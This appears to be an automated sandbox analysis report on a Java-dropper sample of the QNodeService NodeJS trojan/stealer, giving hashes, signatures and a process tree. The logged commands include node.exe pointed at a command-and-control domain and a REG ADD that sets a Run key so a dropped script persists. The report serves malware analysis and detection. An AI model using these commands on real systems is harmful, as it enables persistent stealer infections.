Analysis
-
max time kernel
124s -
max time network
145s -
platform
windows10_x64 -
resource
win10 -
submitted
16-10-2020 10:48
Static task
static1
Behavioral task
behavioral1
Sample
NewOrder101420202.jar
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
NewOrder101420202.jar
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
NewOrder101420202.jar
-
Size
119KB
-
MD5
d2b95d1ab25302ab15dddc817f1ede12
-
SHA1
c7d520278ac9e409d1890f98e91b28f7bfdd7481
-
SHA256
c7f25013b32d98d6b2dff1cb775c175956509171d9ae579cc81147da2a6e3d20
-
SHA512
4a3452beb8255644715d8ce3d6f0fbfd9dcbc113562b7a7c51c888d27b402bd88596dc7d9d31a26c3dd6ac940f7d662d6ba88aaca2693679f5e7b52ef591efbc
Score
10/10
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 1020 node.exe 1908 node.exe 2492 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\5f244acd-cc44-4da6-aa8f-1cbc177846fe = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ad8c-164.dat js behavioral2/files/0x000100000001ad8c-168.dat js behavioral2/files/0x000100000001ad8c-172.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 20 wtfismyip.com 21 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 1020 node.exe 1020 node.exe 1020 node.exe 1020 node.exe 1908 node.exe 1908 node.exe 1908 node.exe 1908 node.exe 2492 node.exe 2492 node.exe 2492 node.exe 2492 node.exe 2492 node.exe 2492 node.exe 2492 node.exe 2492 node.exe 2492 node.exe 2492 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 3104 wrote to memory of 3604 3104 java.exe 76 PID 3104 wrote to memory of 3604 3104 java.exe 76 PID 3604 wrote to memory of 1020 3604 javaw.exe 78 PID 3604 wrote to memory of 1020 3604 javaw.exe 78 PID 1020 wrote to memory of 1908 1020 node.exe 80 PID 1020 wrote to memory of 1908 1020 node.exe 80 PID 1908 wrote to memory of 2492 1908 node.exe 81 PID 1908 wrote to memory of 2492 1908 node.exe 81 PID 2492 wrote to memory of 2328 2492 node.exe 83 PID 2492 wrote to memory of 2328 2492 node.exe 83 PID 2328 wrote to memory of 2732 2328 cmd.exe 84 PID 2328 wrote to memory of 2732 2328 cmd.exe 84
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\NewOrder101420202.jar1⤵
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\492ce0b4.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain qhub55.duckdns.org3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_dAT6Qd\boot.js --hub-domain qhub55.duckdns.org4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_dAT6Qd\boot.js --hub-domain qhub55.duckdns.org5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "5f244acd-cc44-4da6-aa8f-1cbc177846fe" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "5f244acd-cc44-4da6-aa8f-1cbc177846fe" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:2732
-
-
-
-
-
-